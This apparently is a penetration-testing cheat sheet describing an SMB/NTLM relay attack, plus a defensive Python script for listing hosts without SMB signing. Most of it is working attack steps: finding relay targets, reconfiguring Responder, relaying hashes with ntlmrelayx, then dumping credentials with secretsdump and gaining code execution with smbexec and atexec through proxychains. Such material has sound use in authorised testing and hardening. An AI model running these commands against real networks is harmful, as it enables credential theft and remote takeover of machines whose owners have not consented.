SMBRelay
Brief
Instead of cracking captured NTLM hashes to recover the cleartext password, you can relay those hashes to specific machines and potentially gain access.
This attack requires two things:
SMB signing must be disabled on the target (NOTE: by default, SMB signing is enabled on all DC servers)
The relayed user must be an admin on the target machine. Since MS08-068 a hash cannot be relayed back to the machine it came from, and code execution needs the relayed user to have admin rights on the target; otherwise you only get user-level access, for example to an open share.
Attack
In order to relay hashes, we need valid targets. Valid targets are, as described above, machines with SMB signing disabled. To get a list of those valid targets we can use, for example, NetExec (the successor of CrackMapExec) or nmap:
nxc smb $network_ip/$cidr --gen-relay-list Targets.txt
# or
nmap --script=smb2-security-mode.nse -p445 $network_ip
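As an added example (not part of the original notes), a small Python script that turns the nmap smb2-security-mode output into a hardening list: the hosts that do not require signing are the ones a relay can authenticate to, and they are fixed by enforcing signing (RequireSecuritySignature, the "Digitally sign communications (always)" policy). The scan output below is constructed sample text, not a real scan.

```python
import re

# Constructed sample of `nmap --script=smb2-security-mode.nse -p445` output
# (not real scan data); it covers the three verdicts the script can print.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.17
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.23
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb2-security-mode:
|   2.1:
|_    Message signing disabled!
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")


def parse_signing_status(nmap_output: str) -> dict:
    """Map each scanned host to the signing verdict nmap printed for it."""
    status = {}
    host = None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        if host and "Message signing" in line:
            # e.g. "|_    Message signing disabled!" -> "disabled"
            status[host] = line.split("Message signing", 1)[1].strip(" !")
    return status


def hosts_needing_hardening(nmap_output: str) -> list:
    """Hosts where signing is not enforced: these accept relayed authentication."""
    verdicts = parse_signing_status(nmap_output)
    return sorted(h for h, v in verdicts.items() if v != "enabled and required")


if __name__ == "__main__":
    for host in hosts_needing_hardening(SAMPLE_NMAP_OUTPUT):
        print(f"{host}: enforce SMB signing (RequireSecuritySignature = 1)")
```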
Now capture the hashes. First, a small change is needed in Responder's configuration file (/usr/share/responder/responder.conf), so that Responder does not bind the SMB and HTTP ports that ntlmrelayx needs:
[Responder Core]
; Servers to start
SQL = On
; Turn SMB off
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
; Turn HTTP off
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
# then start Responder:
python responder.py -I $interface -rdwv
# in a new shell, run ntlmrelayx to relay the intercepted hashes
ntlmrelayx.py -tf Targets.txt -socks -smb2support
# the output should look like:
ntlmrelayx> socks
Protocol Target Username Port
-------- -------------- ------------------------ ----
SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
SMTP 192.168.48.224 VULNERABLE/NORMALUSER3 25
SMTP 192.168.48.224 CONTOSO/NORMALUSER1 25
IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143
Interact with ntlmrelayx sessions
Proxychains
# edit /etc/proxychains.conf
[ProxyList]
socks4 $your_ip 1080
Retrieve hashes
proxychains ./secretsdump.py $domain/$username@$ip
# or get code execution
proxychains smbexec.py $domain/$user@$ip
proxychains atexec.py $domain/$user@$ip "<cmd>"